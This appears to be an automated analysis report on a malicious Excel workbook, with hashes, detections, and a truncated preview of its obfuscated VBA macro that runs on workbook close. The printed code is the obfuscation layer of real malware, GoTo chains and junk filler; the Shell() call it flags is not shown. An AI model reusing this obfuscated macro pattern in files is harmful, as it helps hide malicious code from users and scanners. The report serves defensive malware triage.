Office (OLE) malware analysis — malicious · 6bcb14ff10354d5a

MALICIOUS

Office (OLE)

283.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2020-09-15

MD5: 3bc7a90fbd9f873fb1709133b5786ac0 SHA-1: dc56aee995cbf61545dd92e508a8fc54cb7e0c9d SHA-256: 6bcb14ff10354d5a41a1a287351d84d5e4dbeb4046ed3b1cbe3f7da6626dcbf2

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros, which is a strong indicator of malicious intent. The ClamAV detection further confirms its malicious nature. The VBA script's structure, with numerous GoTo statements and obfuscated function names, suggests an attempt to hide its true functionality, which is likely to download and execute a secondary payload.

Heuristics 3

ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 94169 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	94169 bytes
SHA-256: `35ab0bf83be37d7e0942d3deebbd5439e90aebce0f64660450b995d0ca49e949`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub K_KCa() OO_O_O End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_BeforeClose(Cancel As Boolean) GoTo uVsqSARDHiHSMfczU: kcAPIsbdxaf: vhwADvTxcLHwQGxLVEEr = "FcCkBn" GoTo pYlKKmuHjCiGYy kewfBlwCyJbqxyIgbEGm: FoobbCKYzTyQoApmg = "vSCMSO" GoTo MTJpkljoagnEfe vhwADvTxcLHwQGxLVEEeFcoCkBnrQFCw: vhwADvTxcLHwQGxLVEEr = "FcCkBn" GoTo LjEdjfruIegpzuQnFa pYlKKmuHjCiGYy: rsNPZwdGQDJdlaF = "BAEqjq" GoTo kewfBlwCyJbqxyIgbEGm uVsqSARDHiHSMfczU: dIRRQVGzGlyxNQTL = "zscMhJNcmHU" GoTo DtZiihmIPQBONe MTJpkljoagnEfe: GoTo WNalUTHsUqDRQCGgUS WNalUTHsUqDRQCGgUS: Dim JJyiKgsHoGryWKHBTQ As Long K_KCa GoTo knfDgLJrgAqhvF ndIRRQVGzGlyxNTLkzscKMhJNcmHUIuVs: dIRRQVGzGlyxNQTL = "zscMhJNcmHU" GoTo mitKZuisPKopVq LjEdjfruIegpzuQnFa: QFCwOLjEdjfruIegp = "uQnFat" GoTo ndIRRQVGzGlyxNTLkzscKMhJNcmHUIuVs knfDgLJrgAqhvF: GoTo obbCKYzTyQoApgyvSCMSOarsN DtZiihmIPQBONe: QFCwOLjEdjfruIegp = "uQnFat" GoTo kcAPIsbdxaf ZwdGQDJdlaFBBAEqjq: rsNPZwdGQDJdlaF = "BAEqjq" GoTo vhwADvTxcLHwQGxLVEEeFcoCkBnrQFCw obbCKYzTyQoApgyvSCMSOarsN: FoobbCKYzTyQoApmg = "vSCMSO" GoTo ZwdGQDJdlaFBBAEqjq mitKZuisPKopVq: End Sub Public Function qQAPwCVeTzuvtyjdkNp() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" End Function Private Sub UiwduhlKywqIFcy() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" Dim nCYZjsnQgzTm As Integer For nCYZjsnQgzTm = 4 To 14 DoEvents Next nCYZjsnQgzTm End Sub Public Sub LJOAtAerqGKNEetmV() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" Dim nCYZjsnQgzTm As Integer For nCYZjsnQgzTm = 4 To 14 DoEvents Next nCYZjsnQgzTm GoTo HVgAOBoOlkMuLxBb HVgAOBoOlkMuLxBb: End Sub Public Function MGZVsOnfbnESocl() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" Dim nCYZjsnQgzTm As Integer For nCYZjsnQgzTm = 4 To 14 DoEvents Next nCYZjsnQgzTm GoTo HVgAOBoOlkMuLxBb HVgAOBoOlkMuLxBb: GoTo PkpxnSccafCJ PkpxnSccafCJ: End Function Public Sub vHHQbeVuJCmTQrTYmiR() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" Dim nCYZjsnQgzTm As Integer For nCYZjsnQgzTm = 4 To 14 DoEvents Next nCYZjsnQgzTm GoTo HVgAOBoOlkMuLxBb HVgAOBoOlkMuLxBb: GoTo PkpxnSccafCJ PkpxnSccafCJ: Dim eqRmQpHhHSMfNlUflhtJ As Currency eqRmQpHhHSMfNlUflhtJ = "3242" End Sub Private Function rOJnpVcvDsY() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" Dim nCYZjsnQgzTm As Integer For nCYZjsnQgzTm = 4 To 14 DoEvents Next nCYZjsnQgzTm GoTo HVgAOBoOlkMuLxBb HVgAOBoOlkMuLxBb: GoTo PkpxnSccafCJ PkpxnSccafCJ: Dim eqRmQpHhHSMfNlUflhtJ As Currency eqRmQpHhHSMfNlUflhtJ = "3242" Dim IPQnNMdSVNmPusaOjaQe As Integer For IPQnNMdSVNmPusaOjaQe = 4 To 10 DoEvents Next IPQnNMdSVNmPusaOjaQe End Function Private Function KluGjCiFYkYUOheBl() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" Dim nCYZjsnQgzTm As Integer For nCYZjsnQgzTm = 4 To 14 DoEvents Next nCYZjsnQgzTm GoTo HVgAOBoOlkMuLxBb HVgAOBoOlkMuLxBb: GoTo PkpxnSccafCJ PkpxnSccafCJ: Dim eqRmQpHhHSMfNlUflhtJ As Currency eqRmQpHhHSMfNlUflhtJ = "3242" Dim IPQnNMdSVNmPusaOjaQe As Integer For IPQnNMdSVNmPusaOjaQe = 4 To 10 DoEvents Next IPQnNMdSVNmPusaOjaQe Dim abwyHfMqFmsLTJpkk As String abwyHfMqFmsLTJpkk = "1464" End Function Public Function RZDePgjmeCgKuqfzqhuE() Dim oNqUFBpKArFPyy As String oNqUFBpKArFPyy = "8261" Dim nCYZjsnQgzTm As Integer For nCYZjsnQgzTm = 4 To 14 DoEvents Next nCYZjsnQgzTm GoTo HVgAOBoOlkMuLxBb HVgAOBoOlkMuLxBb: GoTo PkpxnSccafCJ PkpxnSccafCJ: Dim eqRmQpHhHSMfNlUflhtJ As Currency eqRmQpHhHSMfNlUflhtJ = "3242" Dim IPQnNMdSVNmPusaOjaQe As Integer For IPQnNMdSVNmPusaOjaQe = 4 To 10 DoEvents Next IPQnNMdSVNmPusaOjaQe Dim abwyHfMqFmsLTJpkk As Str ... (truncated)

SHA-256: 35ab0bf83be37d7e0942d3deebbd5439e90aebce0f64660450b995d0ca49e949

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub K_KCa()
OO_O_O
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)

GoTo uVsqSARDHiHSMfczU:

kcAPIsbdxaf:

vhwADvTxcLHwQGxLVEEr = "FcCkBn"

GoTo pYlKKmuHjCiGYy

kewfBlwCyJbqxyIgbEGm:

FoobbCKYzTyQoApmg = "vSCMSO"

GoTo MTJpkljoagnEfe

vhwADvTxcLHwQGxLVEEeFcoCkBnrQFCw:

vhwADvTxcLHwQGxLVEEr = "FcCkBn"

GoTo LjEdjfruIegpzuQnFa

pYlKKmuHjCiGYy:

rsNPZwdGQDJdlaF = "BAEqjq"

GoTo kewfBlwCyJbqxyIgbEGm

uVsqSARDHiHSMfczU:

dIRRQVGzGlyxNQTL = "zscMhJNcmHU"

GoTo DtZiihmIPQBONe

MTJpkljoagnEfe:

GoTo WNalUTHsUqDRQCGgUS

WNalUTHsUqDRQCGgUS:


Dim JJyiKgsHoGryWKHBTQ As Long

K_KCa


GoTo knfDgLJrgAqhvF

ndIRRQVGzGlyxNTLkzscKMhJNcmHUIuVs:

dIRRQVGzGlyxNQTL = "zscMhJNcmHU"

GoTo mitKZuisPKopVq

LjEdjfruIegpzuQnFa:

QFCwOLjEdjfruIegp = "uQnFat"

GoTo ndIRRQVGzGlyxNTLkzscKMhJNcmHUIuVs

knfDgLJrgAqhvF:

GoTo obbCKYzTyQoApgyvSCMSOarsN

DtZiihmIPQBONe:

QFCwOLjEdjfruIegp = "uQnFat"

GoTo kcAPIsbdxaf

ZwdGQDJdlaFBBAEqjq:

rsNPZwdGQDJdlaF = "BAEqjq"

GoTo vhwADvTxcLHwQGxLVEEeFcoCkBnrQFCw

obbCKYzTyQoApgyvSCMSOarsN:

FoobbCKYzTyQoApmg = "vSCMSO"

GoTo ZwdGQDJdlaFBBAEqjq

mitKZuisPKopVq:

End Sub
Public Function qQAPwCVeTzuvtyjdkNp()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"

End Function
Private Sub UiwduhlKywqIFcy()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm

End Sub
Public Sub LJOAtAerqGKNEetmV()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:

End Sub
Public Function MGZVsOnfbnESocl()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:

End Function
Public Sub vHHQbeVuJCmTQrTYmiR()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"

End Sub
Private Function rOJnpVcvDsY()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"
Dim IPQnNMdSVNmPusaOjaQe As Integer
For IPQnNMdSVNmPusaOjaQe = 4 To 10
   DoEvents
Next IPQnNMdSVNmPusaOjaQe

End Function
Private Function KluGjCiFYkYUOheBl()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"
Dim IPQnNMdSVNmPusaOjaQe As Integer
For IPQnNMdSVNmPusaOjaQe = 4 To 10
   DoEvents
Next IPQnNMdSVNmPusaOjaQe
Dim abwyHfMqFmsLTJpkk As String
abwyHfMqFmsLTJpkk = "1464"

End Function
Public Function RZDePgjmeCgKuqfzqhuE()
Dim oNqUFBpKArFPyy As String
oNqUFBpKArFPyy = "8261"
Dim nCYZjsnQgzTm As Integer
For nCYZjsnQgzTm = 4 To 14
   DoEvents
Next nCYZjsnQgzTm
GoTo HVgAOBoOlkMuLxBb
HVgAOBoOlkMuLxBb:
GoTo PkpxnSccafCJ
PkpxnSccafCJ:
Dim eqRmQpHhHSMfNlUflhtJ As Currency
eqRmQpHhHSMfNlUflhtJ = "3242"
Dim IPQnNMdSVNmPusaOjaQe As Integer
For IPQnNMdSVNmPusaOjaQe = 4 To 10
   DoEvents
Next IPQnNMdSVNmPusaOjaQe
Dim abwyHfMqFmsLTJpkk As Str
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.